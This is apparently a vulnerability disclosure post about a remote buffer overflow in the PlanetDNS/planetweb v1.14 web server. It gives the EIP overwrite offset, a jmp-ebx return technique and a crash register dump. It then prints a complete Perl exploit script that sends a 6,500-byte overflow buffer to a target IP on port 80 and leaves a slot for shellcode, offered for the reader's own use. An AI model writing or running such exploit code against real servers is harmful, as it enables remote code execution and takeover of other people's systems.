hi planetdns ( http://www.planetdns.net)is commercial software package that allows you to turn computer into an Internet server. and be able to create an Internet Name, connect to a web server, FTP, mail server, etc. running on your computer. planetdns is vulnerable has a buffer overflow with a overwrite of eip (never posted before )... one already notified that a number of 1024 byte could crasher the server, and I found that while sending (without GET/)un of 6500 byte could thus make a overwrite eip of execution of a shellcode, the overwrite is done with byte 6449, 50, 51, 52. one notices of aillor that ebx and always 4byte before the eip the ret address will be thus a jmp ebx or call ebx that one finds in many modules charged . I realised an exploit tested on plaetweb v1.14 and who gives L state of the following registers: Access violation - code c0000005 (first chance) eax=0217dfb0 ebx=0217ffdc ecx=41414141 edx=7846f5b5 esi=0217dfd8 edi=00000000 eip=41414141 esp=0217df18 ebp=0217df38 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 43434343 ?? ??? exploit code: #!/usr/bin/perl -w #tool bop.pl # buffer overflow tested against plaetweb v1.14 # humm..this exploit is not for lamers... # Greetz: marocit and #crack.fr (specialemet christal...plus tu pédales moins fort, moins tu #avances plus vite..) # use IO::Socket; if ($#ARGV<0) { print "\n write the target IP!! \n\n"; exit; } $shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad d your favorit shellcode $buffer = "A"x6444; $ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3 $ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx) $minibuf ="\x90\x90\x90\x90";# will be jumped by EB08 $connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" } print $connect "$buffer$ebx$ret$minibuf$shellcode"; print "\nsending exploit......\n\n"; _________________________________________________________ Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166 (0,34€ Hors coût du SMS)
